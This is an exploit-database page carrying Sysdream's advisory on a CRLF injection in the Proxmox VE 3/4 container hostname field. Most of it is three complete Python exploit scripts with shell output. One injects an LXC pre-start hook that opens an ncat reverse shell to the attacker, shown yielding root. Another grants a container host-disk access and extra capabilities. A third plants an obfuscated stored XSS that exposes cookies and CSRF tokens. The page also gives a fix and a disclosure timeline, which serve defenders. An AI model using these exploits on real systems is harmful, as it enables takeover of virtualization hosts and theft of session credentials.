Menu

Search for hundreds of thousands of exploits

"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution"

Author

Exploit author

Sysdream

Platform

Exploit platform

linux

Release date

Exploit published date

2016-02-26

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
=====================================================================
Proxmox VE 3/4 Insecure Hostname Checking (Remote Root Exploit, XSS,
Privileges escalation)
=====================================================================

Description
===========

Proxmox is a popular virtualization solution based on KVM and Linux
containers.

A critical vulnerability has been found in Proxmox VE 3 (OpenVZ) and
Proxmox VE 4 beta 1 (LXC) in the
virtual machine creating form allowing authenticated remote users to
overwrite configuration files settings.


Configuration file overwriting
==============================

Because the Proxmox VE application doesn't check the
user-provided "hostname" POST parameter, it's
possible to overwrite configuration files using a CRLF injection.
In Proxmox VE 3, we successfully gained access to the host filesystem
from a container and elevated our container capabilities, allowing us to
obtain user credentials and sniff the network.
In Proxmox VE 4b1, because LXC allows "hooks" to execute commands, we
successfully gained root privileges on the host.
It's also possible to exploit Proxmox clusters.

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-915

Proof of Concept
----------------

The following exploit works for Proxmox VE 4 beta 1. The
lxc.hook.pre-start configuration variable is used to trigger the ncat
reverse-shell payload when the container is started.

    #!/usr/bin/env python

    import requests
    import socket
    import telnetlib
    from threading import Thread
    import argparse
    from time import sleep

    def exploit(target, username, password, vmid, template, realm,
reverse, hostname):
        payload = "ncat %s %s -e /bin/sh" % reverse

        print "[~] Obtaining authorization key..."
        apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
                               verify=False,
                               data={"username": username,
                                     "password": password,
                                     "realm": realm})
        response = apireq.json()
        if "success" in response and response["success"]:
            print "[+] Authentication success."
            ticket = response["data"]["ticket"]
            csrfticket = response["data"]["CSRFPreventionToken"]
            createvm =
requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname),
                                     verify=False,
                                     headers={"CSRFPreventionToken":
csrfticket},
                                     cookies={"PVEAuthCookie": ticket},
                                     data={"vmid": vmid,

"hostname":"sysdream\nlxc.hook.pre-start=%s &&" % payload,
                                           "storage": "local",
                                           "password": "sysdream",
                                           "ostemplate": template,
                                           "memory": 512,
                                           "swap": 512,
                                           "disk": 2,
                                           "cpulimit": 1,
                                           "cpuunits": 1024,
                                           "net0":"name=eth0"})
            if createvm.status_code == 200:
                response = createvm.json()
                if "success" in response and response["success"]:
                    print "[+] Container Created... (Sleeping 20 seconds)"
                    sleep(20)
                    print "[+] Starting container..."
                    startcontainer =
requests.post("https://%s/api2/extjs/nodes/%s/lxc/%s/status/start" %
(target, hostname, vmid), verify=False, headers={"CSRFPreventionToken":
csrfticket}, cookies={"PVEAuthCookie": ticket})
                    if startcontainer.status_code == 200:
                        response = startcontainer.json()
                        if "success" in response and response["success"]:
                            print "[+] Exploit should be working..."
                        else:
                            print "[!] Can't start container ! Try to
start it manually."
                else:
                    print "[!] Error creating container..."
                    print response
            else:
                print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
        else:
            print "[!] Authentication failed - Check the credentials..."

    def handler(lport):
        print "[~] Starting handler on port %d" % lport
        t = telnetlib.Telnet()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", lport))
        s.listen(1)
        conn, addr = s.accept()

        print "[+] Connection from %s" % addr[0]

        t.sock = conn

        print "[+] Pop the shell ! :)"

        t.interact()

    if __name__ == "__main__":
        print "[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas
Chatelain <n.chatelain[at]sysdream.com>\n"

        parser = argparse.ArgumentParser()
        parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")

        parser.add_argument("--username", required=True)
        parser.add_argument("--password", required=True)

        parser.add_argument("--localhost", required=True, help="Local
host IP for the connect-back shell.")
        parser.add_argument("--localport", required=True, type=int,
help="Local port for local bind handler")

        parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")

        parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
                            help="An existing template in the hypervisor "
                                 "(default :
local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")

        parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])

        parser.add_argument("--hostname", required=True, help="The
target hostname")

        args = parser.parse_args()

        handlerthr = Thread(target=handler, args=(args.localport,))
        handlerthr.start()

        exploitthr = Thread(target=exploit, args=(args.target,
args.username, args.password, args.vmid, args.template, args.realm,
(args.localhost, args.localport), args.hostname))
        exploitthr.start()

        handlerthr.join()

Shell output :

    nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python
remoteroot.py --target 10.25.0.101:8006 --username nicolas --password
pveuser --localhost 10.25.0.10 --localport 9999 --vmid 456 --realm pve
--hostname pve4
    [~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas Chatelain
<n.chatelain[at]sysdream.com>
    [~] Starting handler on port 9999
    [~] Obtaining authorization key...
    [+] Authentication success.
    [+] Container Created... (Sleeping 20 seconds)
    [+] Exploit should be working...
    [+] Connection from 10.25.0.101
    [+] Pop the shell !
    whoami
    root
    id
    uid=0(root) gid=0(root) groups=0(root)

The following exploit works for Proxmox VE 3. This proof of concept
mount the host /dev/dm-0 on the container and add multiples capabilities
on the container.


    #!/usr/bin/env python

    import requests
    import socket
    import telnetlib
    from threading import Thread
    import argparse

    def exploit(target, username, password, vmid, template, realm,
hostname):
        payload = "sysdream\"\nDEVNODES=\"dm-0:r
\"\nCAPABILITIES=\"mknod:on, sys_chroot:on, sys_rawio: on, net_admin:on,
dac_override:on\"\n#"
        print "[~] Obtaining authorization key..."
        apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
                               verify=False,
                               data={"username": username,
                                     "password": password,
                                     "realm": realm})
        response = apireq.json()
        if "success" in response and response["success"]:
            print "[+] Authentication success."
            ticket = response["data"]["ticket"]
            csrfticket = response["data"]["CSRFPreventionToken"]
            createvm =
requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname),
                                     verify=False,
                                     headers={"CSRFPreventionToken":
csrfticket},
                                     cookies={"PVEAuthCookie": ticket},
                                     data={"vmid": vmid,
                                           "hostname": payload,
                                           "storage": "local",
                                           "password": "sysdream",
                                           "ostemplate": template,
                                           "memory": 512,
                                           "swap": 512,
                                           "disk": 2,
                                           "cpus": 1,

"netif":"ifname=eth0,bridge=vmbr0"})
            if createvm.status_code == 200:
                response = createvm.json()
                if "success" in response and response["success"]:
                    print "[+] Countainer (Capabilities + DM-0 Mount)
Created."
                else:
                    print "[!] Error creating container..."
                    print response
            else:
                print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
        else:
            print "[!] Authentication failed - Check the credentials..."

    if __name__ == "__main__":
        print "[~] Proxmox VE 3 Authenticated Privileges Escalation
Exploit - Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"

        parser = argparse.ArgumentParser()
        parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")

        parser.add_argument("--username", required=True)
        parser.add_argument("--password", required=True)

        parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")

        parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
                            help="An existing template in the hypervisor
(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")

        parser.add_argument("--hostname", required=True, help="The
target hostname")

        parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])

        args = parser.parse_args()

        exploit(args.target, args.username, args.password, args.vmid,
args.template, args.realm, args.hostname)

Shell output :

    nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python
privescalation.py --username root --password sysofdream --vmid 123
--realm pam --target 10.25.0.110:8006 --hostname pve3
    [~] Proxmox VE 3 Authenticated Privileges Escalation Exploit -
Nicolas Chatelain <n.chatelain[at]sysdream.com>

    [~] Obtaining authorization key...
    [+] Authentication success.
    [+] Countainer (Capabilities + DM-0 Mount) Created.

-- On container :

    root@sysdream:/# ls -lah /dev/dm-0
    brw-r----T 1 root root 253, 0 Aug 23 00:33 /dev/dm-0

---
Stored Cross-Site Scripting
===========================

Same vulnerability, different usage. Works on Proxmox 3 and Proxmox 4b1.

**Access Vector**: remote

**Security Risk**: high


Proof of Concept
----------------

The following exploit will create a stored XSS displaying the user
cookies and the PVE CSRFPreventionToken.


    #!/usr/bin/env python

    import requests
    import socket
    import telnetlib
    from threading import Thread
    import argparse

    def exploit(target, username, password, vmid, template, realm,
version, hostname):
        payload =
"eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,45,34,32,43,32,80,86,69,46,67,83,82,70,80,114,101,118,101,110,116,105,111,110,84,111,107,101,110,41,59))"
        print "[~] Obtaining authorization key..."
        apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
                               verify=False,
                               data={"username": username,
                                     "password": password,
                                     "realm": realm})
        response = apireq.json()
        if "success" in response and response["success"]:
            print "[+] Authentication success."
            ticket = response["data"]["ticket"]
            csrfticket = response["data"]["CSRFPreventionToken"]
            if version == "4":
                createvm =
requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname),
                                         verify=False,
                                         headers={"CSRFPreventionToken":
csrfticket},
                                         cookies={"PVEAuthCookie": ticket},
                                         data={"vmid": vmid,

"hostname":"<img/src='x'/onerror=%s>" % payload,
                                               "storage": "local",
                                               "password": "sysdream",
                                               "ostemplate": template,
                                               "memory": 512,
                                               "swap": 512,
                                               "disk": 2,
                                               "cpulimit": 1,
                                               "cpuunits": 1024,
                                               "net0":"name=eth0"})
            elif version == "3":
                   createvm =
requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname),
                                         verify=False,
headers={"CSRFPreventionToken": csrfticket},
                                         cookies={"PVEAuthCookie": ticket},
                                         data={"vmid": vmid,

"hostname":"<img/src='x'/onerror=%s>" % payload,
                                               "storage": "local",
                                               "password": "sysdream",
                                               "ostemplate": template,
                                               "memory": 512,
                                               "swap": 512,
                                               "disk": 2,
                                               "cpus": 1,

"netif":"ifname=eth0,bridge=vmbr0"})
            if createvm.status_code == 200:
                response = createvm.json()
                if "success" in response and response["success"]:
                    print "[+] Stored XSS Created."
                else:
                    print "[!] Error creating container..."
                    print response
            else:
                print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
        else:
            print "[!] Authentication failed - Check the credentials..."

    if __name__ == "__main__":
        print "[~] Proxmox VE 3/4b1 Stored Cross Site Scripting -
Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"

        parser = argparse.ArgumentParser()
        parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")

        parser.add_argument("--username", required=True)
        parser.add_argument("--password", required=True)

        parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")

        parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
                            help="An existing template in the hypervisor
(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")

        parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])

        parser.add_argument("--version", default="3", choices=["3",
"4"], help="The Proxmox version to exploit")

        parser.add_argument("--hostname", required=True, help="The
target hostname")

        args = parser.parse_args()

        exploit(args.target, args.username, args.password, args.vmid,
args.template, args.realm, args.version, args.hostname)

---------------
Vulnerable code
---------------

The vulnerable code is located in the /usr/share/perl5/PVE/LXC.pm for
Proxmox 4.

For Proxmox 3, the vulnerable code is located in
/usr/share/perl5/PVE/OpenVZ.pm.

--------
Solution
--------

Proxmox 4 : Update to pve-container 0.9-22

Proxmox 3 : Update to pve-manager 3.4-10

Timeline (dd/mm/yyyy)
=====================

04/09/2015 : Initial discovery.
17/09/2015 : Contact with proxmox team.
18/09/2015 : Proxmox fixes the vulnerabilities.
18/09/2015 : Proxmox releases a new pve-container version (0.9-22)
18/09/2015 : Proxmox releases a new pve-manager version (3.4-10)

Affected versions
=================

* Proxmox VE 4
* Proxmox VE 3


Credits
=======

* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2019-01-14 "AudioCode 400HD - Command Injection" webapps cgi Sysdream
2018-05-30 "Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection" webapps php Sysdream
2018-01-05 "Gespage 7.4.8 - SQL Injection" webapps jsp Sysdream
2017-10-02 "UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape" local linux Sysdream
2017-10-02 "phpCollab 2.5.1 - SQL Injection" webapps php Sysdream
2017-10-02 "phpCollab 2.5.1 - Arbitrary File Upload" webapps php Sysdream
2017-10-02 "UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation" local linux Sysdream
2017-05-05 "ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities" webapps php Sysdream
2017-03-27 "EyesOfNetwork (EON) 5.0 - Remote Code Execution" webapps php Sysdream
2017-03-27 "Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)" webapps jsp Sysdream
2017-03-27 "EyesOfNetwork (EON) 5.0 - SQL Injection" webapps php Sysdream
2016-10-20 "SPIP 3.1.2 - Cross-Site Request Forgery" webapps php Sysdream
2016-10-20 "SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution" webapps php Sysdream
2016-10-20 "SPIP 3.1.1/3.1.2 - File Enumeration / Path Traversal" webapps php Sysdream
2016-07-06 "OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities" webapps jsp Sysdream
2016-02-26 "Zimbra 8.0.9 GA - Cross-Site Request Forgery" webapps linux Sysdream
2016-02-26 "Centreon 2.5.3 - Remote Command Execution" webapps php Sysdream
2016-02-26 "Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution" remote linux Sysdream
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.